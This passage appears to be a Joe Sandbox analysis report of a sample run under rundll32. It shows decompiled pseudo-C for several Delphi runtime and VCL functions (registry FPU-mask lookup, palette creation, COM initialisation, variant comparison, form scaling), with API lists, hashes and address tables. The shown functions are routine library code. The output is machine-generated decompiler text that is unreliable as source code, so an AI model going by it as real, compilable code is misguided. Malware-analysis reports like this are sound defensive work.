                          • GetCurrentThreadId.KERNEL32 ref: 027D6200
                            • Part of subcall function 027D307C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D309E
                            • Part of subcall function 027D307C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30D1
                            • Part of subcall function 027D307C: RegCloseKey.ADVAPI32(?,027D30F4,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30E7
                          • GetThreadLocale.KERNEL32 ref: 027D61E0
                            • Part of subcall function 027D6070: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027D60D6), ref: 027D6096
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                          • String ID:
                          • API String ID: 3734044017-0
                          • Opcode ID: eb4abc3db195543121c43a6fc0863662160db97db39d7a5c23249775cc6bb4d1
                          • Instruction ID: 08023a92a5043ff2935be76b16582baf6e43f18f39c0fdc0688dd9294c547c7d
                          • Opcode Fuzzy Hash: eb4abc3db195543121c43a6fc0863662160db97db39d7a5c23249775cc6bb4d1
                          • Instruction Fuzzy Hash: 8801EDACC94342DAEB12BF64F51C3593AB6AB11304FC4695AC1948A6D2EB3D8124CF97
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FD844 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E027FD844(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t72;
				void* _t74;
				void* _t75;
				struct HDC__* _t76;
				intOrPtr _t97;
				void* _t107;
				void* _t109;
				void* _t110;
				intOrPtr _t112;

				_t107 = _t109;
				_t110 = _t109 + 0xffffffa0;
				_t72 = __edx;
				_v8 = __eax;
				_t44 = E027FC980(_v8);
				if(_t72 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t72 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x286440c; // 0x27f5374
							_t44 = E027F87AC(_t49);
							goto L16;
						} else {
							E027D2C20( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t112 = _t110 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x028638A7 & 0x000000ff;
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t74 = _t72 - 2;
							if(_t74 == 0) {
								_t56 =  *0x28658c8; // 0x570809f5
								_v12 = _t56;
							} else {
								_t75 = _t74 - 1;
								if(_t75 == 0) {
									_t76 = E027F88E4(GetDC(0));
									_v12 = CreateHalftonePalette(_t76);
									_v13 = 1;
									ReleaseDC(0, _t76);
								} else {
									if(_t75 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t112;
							 *((char*)(_v8 + 0x22)) = E027FC460( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x27fd991, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0x27fd998);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                          0x027fd845
                          0x027fd847
                          0x027fd84d
                          0x027fd84f
                          0x027fd855
                          0x027fd85c
                          0x027fd9a3
                          0x027fd9a9
                          0x027fd862
                          0x027fd864
                          0x027fd866
                          0x027fd875
                          0x00000000
                          0x027fd868
                          0x027fd86a
                          0x027fd87d
                          0x027fd882
                          0x00000000
                          0x027fd86c
                          0x027fd896
                          0x027fd8ac
                          0x027fd8ac
                          0x027fd8ae
                          0x027fd8b4
                          0x027fd8b7
                          0x027fd8c1
                          0x027fd8c7
                          0x027fd8ca
                          0x027fd8db
                          0x027fd8e2
                          0x027fd8e5
                          0x027fd8e8
                          0x027fd8f5
                          0x027fd8fa
                          0x027fd8ea
                          0x027fd8ea
                          0x027fd8ec
                          0x027fd90b
                          0x027fd913
                          0x027fd916
                          0x027fd91d
                          0x027fd8ee
                          0x027fd8f1
                          0x027fd924
                          0x027fd92b
                          0x027fd932
                          0x027fd939
                          0x027fd939
                          0x027fd8f1
                          0x027fd8ec
                          0x027fd94b
                          0x027fd971
                          0x027fd976
                          0x027fd979
                          0x027fd97c
                          0x027fd985
                          0x00000000
                          0x027fd98b
                          0x027fd990
                          0x027fd990
                          0x027fd86a
                          0x027fd866

                          APIs
                          • GetDC.USER32(00000000), ref: 027FD901
                          • CreateHalftonePalette.GDI32(00000000,00000000), ref: 027FD90E
                          • ReleaseDC.USER32(00000000,00000000), ref: 027FD91D
                          • DeleteObject.GDI32(00000000), ref: 027FD98B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateDeleteHalftoneObjectPaletteRelease
                          • String ID: (
                          • API String ID: 577518360-3887548279
                          • Opcode ID: 913ed78100d0f66f600c79762bbbff4a264d317a962631ba28e9c22610010930
                          • Instruction ID: 2e06097874ae62d57708d157c22bb8bd2b72872fa0b86a0a100b49cf6d797ef2
                          • Opcode Fuzzy Hash: 913ed78100d0f66f600c79762bbbff4a264d317a962631ba28e9c22610010930
                          • Instruction Fuzzy Hash: C441BF70A08208DFDB65DFE8C449BDEBBF6EF89304F0080A5E908A7395D7759A05DB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02809CC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E02809CC4(char __edx, void* __edi, void* __fp0) {
				char _v5;
				void* __ecx;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t24;
				char _t28;
				intOrPtr* _t29;
				intOrPtr* _t35;
				char _t40;
				void* _t45;
				intOrPtr _t47;
				struct HINSTANCE__* _t48;
				void* _t49;
				void* _t50;
				void* _t57;

				_t57 = __fp0;
				_t45 = __edi;
				_t40 = __edx;
				if(__edx != 0) {
					_t50 = _t50 + 0xfffffff0;
					_t14 = E027D3570(_t14, _t49);
				}
				_v5 = _t40;
				_t35 = _t14;
				E02809004(0x200);
				E0280D6B4(0, _t45, _t57);
				 *((intOrPtr*)(_t35 + 0x278)) = E02813638(0x280a164, _t35);
				E0280A83C(_t35, 1);
				 *((intOrPtr*)( *_t35 + 0x10c))();
				_t24 =  *((intOrPtr*)(_t35 + 0x23c));
				 *((intOrPtr*)(_t24 + 0x10)) = _t35;
				 *((intOrPtr*)(_t35 + 0x28c)) =  *((intOrPtr*)(_t24 + 0x14));
				_t47 = E027D31DC(1);
				 *((intOrPtr*)(_t35 + 0x27c)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t35;
				 *((intOrPtr*)(_t47 + 8)) = 0x2809fc0;
				 *((char*)(_t35 + 0x289)) = 0;
				_t28 =  *0x2809dcc; // 0x2
				 *((char*)(_t35 + 0x26c)) = _t28;
				if( *0x2865b2c == 0) {
					 *0x2865b2c = 1;
					_t48 = GetModuleHandleA("ole32.dll");
					if(_t48 != 0) {
						 *0x2865b28 = GetProcAddress(_t48, "CoInitializeEx");
					}
				}
				if( *0x2865b28 == 0) {
					_push(0);
					L027E81A8();
				} else {
					 *0x2865b28(0, 2);
				}
				_t29 = _t35;
				if(_v5 != 0) {
					E027D35C8(_t29);
					_pop( *[fs:0x0]);
				}
				return _t35;
			}


















                          0x02809cc4
                          0x02809cc4
                          0x02809cc4
                          0x02809ccc
                          0x02809cce
                          0x02809cd1
                          0x02809cd1
                          0x02809cd8
                          0x02809cdb
                          0x02809ce2
                          0x02809ced
                          0x02809cfd
                          0x02809d0c
                          0x02809d17
                          0x02809d1d
                          0x02809d23
                          0x02809d29
                          0x02809d3b
                          0x02809d3d
                          0x02809d43
                          0x02809d46
                          0x02809d4d
                          0x02809d54
                          0x02809d59
                          0x02809d66
                          0x02809d68
                          0x02809d79
                          0x02809d7d
                          0x02809d8a
                          0x02809d8a
                          0x02809d7d
                          0x02809d96
                          0x02809da4
                          0x02809da6
                          0x02809d98
                          0x02809d9c
                          0x02809d9c
                          0x02809dab
                          0x02809db1
                          0x02809db3
                          0x02809db8
                          0x02809dbf
                          0x02809dc8

                          APIs
                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02809D74
                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02809D85
                          • CoInitialize.OLE32(00000000), ref: 02809DA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleInitializeModuleProc
                          • String ID: CoInitializeEx$ole32.dll
                          • API String ID: 3965314501-4163290989
                          • Opcode ID: 01c9261e790b904b3502d7cdb6869cbfaf8cdfc156619c0724471ad48799f437
                          • Instruction ID: f3bf643149394488cd340843c588d76647d32d6bcb084a9a54530c3e3891b77b
                          • Opcode Fuzzy Hash: 01c9261e790b904b3502d7cdb6869cbfaf8cdfc156619c0724471ad48799f437
                          • Instruction Fuzzy Hash: B721BFBCA853409FE781AF289CC97557BA59B09718F4844B8EC09DB3C3CA75A8448F62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D307C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 65%
                          			E027D307C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x2863020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x2863020; // 0x27f
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x2863020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E027D30ED);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x27d30f4);
					return RegCloseKey(_v8);
				}
			}












                          0x027d307d
                          0x027d307f
                          0x027d3089
                          0x027d30a5
                          0x027d30f4
                          0x027d3106
                          0x027d3109
                          0x027d3112
                          0x027d30a7
                          0x027d30a9
                          0x027d30aa
                          0x027d30af
                          0x027d30b2
                          0x027d30b5
                          0x027d30d1
                          0x027d30d8
                          0x027d30db
                          0x027d30de
                          0x027d30ec
                          0x027d30ec

                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D309E
                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30D1
                          • RegCloseKey.ADVAPI32(?,027D30F4,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                          • API String ID: 3677997916-4173385793
                          • Opcode ID: 1b9f25a083137ef7f8a21cb9c4c832e583f4693488cdd85b897c92e220087ac9
                          • Instruction ID: 01f9de5334f721981840f4b199f5332e8d4cca9611e82ec21144ea9a1c77d2f0
                          • Opcode Fuzzy Hash: 1b9f25a083137ef7f8a21cb9c4c832e583f4693488cdd85b897c92e220087ac9
                          • Instruction Fuzzy Hash: 8A01D4B9E44309BAFB11EB94DC46FE9BBBCEB08B00F5005E1FA04E2980E6755910CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027E4158 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E027E4158(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E027E6434(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E027E6434(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E027DED9C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L027DDCD4();
													_push(_t346);
													_push(0x27e4539);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E027DFDA4( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E027DECAC(_t268);
													}
													_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x27e456c);
													return E027DF538( &_v44);
												}
											}
										} else {
											E027DED9C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L027DDCD4();
										_push(_t346);
										_push(0x27e4483);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E027DFDA4( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E027DECAC(_t273);
										}
										_v13 = E027E3FCC( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x27e456c);
										return E027DF538( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L027DDCD4();
										_push(_t346);
										_push(0x27e43e1);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E027DFDA4( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E027DECAC(_t278);
										}
										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x27e456c);
										return E027DF538( &_v44);
									}
								}
							} else {
								E027DED9C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E027E3DAC(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E027E3D98(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E027E6434( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L027DDCD4();
									_push(_t346);
									_push(0x27e42f1);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E027DFDA4( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E027DECAC(_t284);
									}
									_v13 = E027E3FCC(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x27e456c);
									return E027DF538( &_v44);
								} else {
									if( *_t256 == _v16) {
										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L027DDCD4();
										_push(_t346);
										_push(0x27e4263);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E027DFDA4( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E027DECAC(_t289);
										}
										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x27e456c);
										return E027DF538( &_v44);
									}
								}
							} else {
								E027DED9C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E027E3DAC(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E027E3D98(1, 0);
						L46:
						return _v13;
					}
				}
			}























                          0x027e4158
                          0x027e4159
                          0x027e415b
                          0x027e4160
                          0x027e4163
                          0x027e4166
                          0x027e4168
                          0x027e416c
                          0x027e4179
                          0x027e42fb
                          0x027e4301
                          0x027e431b
                          0x027e433d
                          0x027e434c
                          0x027e435f
                          0x027e4415
                          0x027e4422
                          0x027e4499
                          0x027e44a8
                          0x027e44ba
                          0x027e4567
                          0x00000000
                          0x027e44c0
                          0x027e44c7
                          0x027e4562
                          0x00000000
                          0x027e44c9
                          0x027e44cc
                          0x027e44cd
                          0x027e44d4
                          0x027e44d5
                          0x027e44da
                          0x027e44dd
                          0x027e44e0
                          0x027e44e9
                          0x027e44f6
                          0x027e44f8
                          0x027e44f8
                          0x027e4520
                          0x027e4525
                          0x027e4528
                          0x027e452b
                          0x027e4538
                          0x027e4538
                          0x027e44c7
                          0x027e449b
                          0x027e449b
                          0x00000000
                          0x027e449b
                          0x027e4424
                          0x027e4427
                          0x027e4428
                          0x027e442f
                          0x027e4430
                          0x027e4435
                          0x027e4438
                          0x027e443e
                          0x027e4446
                          0x027e4455
                          0x027e4457
                          0x027e4457
                          0x027e446a
                          0x027e446f
                          0x027e4472
                          0x027e4475
                          0x027e4482
                          0x027e4482
                          0x027e4365
                          0x027e436f
                          0x027e440a
                          0x00000000
                          0x027e4371
                          0x027e4374
                          0x027e4375
                          0x027e437c
                          0x027e437d
                          0x027e4382
                          0x027e4385
                          0x027e4388
                          0x027e4392
                          0x027e439f
                          0x027e43a1
                          0x027e43a1
                          0x027e43c8
                          0x027e43cd
                          0x027e43d0
                          0x027e43d3
                          0x027e43e0
                          0x027e43e0
                          0x027e436f
                          0x027e433f
                          0x027e433f
                          0x00000000
                          0x027e433f
                          0x027e431d
                          0x027e4329
                          0x00000000
                          0x027e4329
                          0x027e4303
                          0x027e430c
                          0x00000000
                          0x027e430c
                          0x027e417f
                          0x027e4182
                          0x027e4199
                          0x027e41bf
                          0x027e41ce
                          0x027e41e0
                          0x027e4297
                          0x027e4298
                          0x027e429f
                          0x027e42a0
                          0x027e42a5
                          0x027e42a8
                          0x027e42ab
                          0x027e42b4
                          0x027e42c4
                          0x027e42c6
                          0x027e42c6
                          0x027e42d8
                          0x027e42dd
                          0x027e42e0
                          0x027e42e3
                          0x027e42f0
                          0x027e41e6
                          0x027e41ed
                          0x027e428c
                          0x00000000
                          0x027e41ef
                          0x027e41f2
                          0x027e41f3
                          0x027e41fa
                          0x027e41fb
                          0x027e4200
                          0x027e4203
                          0x027e4206
                          0x027e420f
                          0x027e4220
                          0x027e4222
                          0x027e4222
                          0x027e424a
                          0x027e424f
                          0x027e4252
                          0x027e4255
                          0x027e4262
                          0x027e4262
                          0x027e41ed
                          0x027e41c1
                          0x027e41c1
                          0x00000000
                          0x027e41c1
                          0x027e419b
                          0x027e41a7
                          0x00000000
                          0x027e41a7
                          0x027e4184
                          0x027e418d
                          0x027e456c
                          0x027e4574
                          0x027e4574
                          0x027e4182

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41ff81b90a6dbc3eb3cf913938c468f38d92ce9c34f1d26e51492ce6dc0d4be6
                          • Instruction ID: 67f5aed747de419ec5dfefdde0213f02249c1858a83cd184ac359d28a96d034e
                          • Opcode Fuzzy Hash: 41ff81b90a6dbc3eb3cf913938c468f38d92ce9c34f1d26e51492ce6dc0d4be6
                          • Instruction Fuzzy Hash: DCD17C39A00249AFCF12EFA4C4909EDBBBAEF4D710F5444A5E842A7711D730AA46CF75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028159C4 Relevance: 7.7, APIs: 5, Instructions: 174COMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E028159C4(intOrPtr __eax, intOrPtr __edx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				char _v17;
				signed char _t114;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t182;
				void* _t191;
				signed char _t205;
				intOrPtr _t207;
				intOrPtr _t219;
				void* _t224;
				void* _t226;

				_t226 = __eflags;
				_t223 = _t224;
				_v12 = __edx;
				_v8 = __eax;
				E02830814(_v8);
				_push(_t224);
				_push(0x2815c47);
				_push( *[fs:eax]);
				 *[fs:eax] = _t224 + 0xfffffff0;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_v17 = 0;
				_t114 =  *0x2865665; // 0x0
				 *(_v8 + 0x234) = _t114 ^ 0x00000001;
				E0282FF70(_v8, _t191, _v12, _t226);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t119 = _v8;
					_t235 =  *((intOrPtr*)(_t119 + 0x268));
					if( *((intOrPtr*)(_t119 + 0x268)) > 0) {
						E0282D16C(_v8,  *(_v8 + 0x268), _t235);
					}
					_t120 = _v8;
					_t236 =  *((intOrPtr*)(_t120 + 0x26c));
					if( *((intOrPtr*)(_t120 + 0x26c)) > 0) {
						E0282D1B0(_v8,  *(_v8 + 0x26c), _t236);
					}
					_t205 =  *0x2815c54; // 0x0
					 *(_v8 + 0x98) = _t205;
					_t237 = _v17;
					if(_v17 == 0) {
						E02814E5C(_v8, 1, 1);
						E02833A40(_v8, 1, 1, _t237);
					}
					E0282E93C(_v8, 0, 0xb03d, 0);
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(0x2815c4e);
					return E0283081C(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t219 =  *0x2865b5c; // 0x41d1150
						_t25 = _t219 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t25) {
							_t182 =  *0x2865b5c; // 0x41d1150
							_t28 = _t182 + 0x40; // 0x60
							E027F76C0( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E027F76B8( *((intOrPtr*)(_v8 + 0x68))),  *_t28,  *(_v8 + 0x25c)), __edi, _t223);
						}
					}
					_t139 =  *0x2865b5c; // 0x41d1150
					_t33 = _t139 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t33;
					_v16 = E02815DB8(_v8);
					_t143 = _v8;
					_t231 =  *((intOrPtr*)(_t143 + 0x270)) - _v16;
					if( *((intOrPtr*)(_t143 + 0x270)) != _v16) {
						_v17 = 1;
						E02814E5C(_v8,  *(_v8 + 0x270), _v16);
						E02833A40(_v8,  *(_v8 + 0x270), _v16, _t231);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _v16,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _v16,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _v16,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _v16,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}



















                          0x028159c4
                          0x028159c5
                          0x028159ca
                          0x028159cd
                          0x028159d3
                          0x028159da
                          0x028159db
                          0x028159e0
                          0x028159e3
                          0x028159eb
                          0x028159f6
                          0x02815a01
                          0x02815a07
                          0x02815a0b
                          0x02815a15
                          0x02815a21
                          0x02815a30
                          0x02815bad
                          0x02815bad
                          0x02815bb0
                          0x02815bb7
                          0x02815bc5
                          0x02815bc5
                          0x02815bca
                          0x02815bcd
                          0x02815bd4
                          0x02815be2
                          0x02815be2
                          0x02815bea
                          0x02815bf0
                          0x02815bf6
                          0x02815bfa
                          0x02815c09
                          0x02815c1b
                          0x02815c1b
                          0x02815c2c
                          0x02815c33
                          0x02815c36
                          0x02815c39
                          0x02815c46
                          0x02815a46
                          0x02815a50
                          0x02815a5b
                          0x02815a61
                          0x02815a64
                          0x02815a70
                          0x02815a75
                          0x02815a92
                          0x02815a92
                          0x02815a64
                          0x02815a97
                          0x02815a9c
                          0x02815aa2
                          0x02815ab0
                          0x02815ab3
                          0x02815abc
                          0x02815abf
                          0x02815ac5
                          0x02815ad8
                          0x02815aec
                          0x02815afb
                          0x02815b1d
                          0x02815b1d
                          0x02815b2d
                          0x02815b4f
                          0x02815b4f
                          0x02815b5f
                          0x02815b81
                          0x02815ba7
                          0x02815ba7
                          0x02815b5f
                          0x00000000
                          0x02815abf

                          APIs
                          • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 02815A85
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B15
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B47
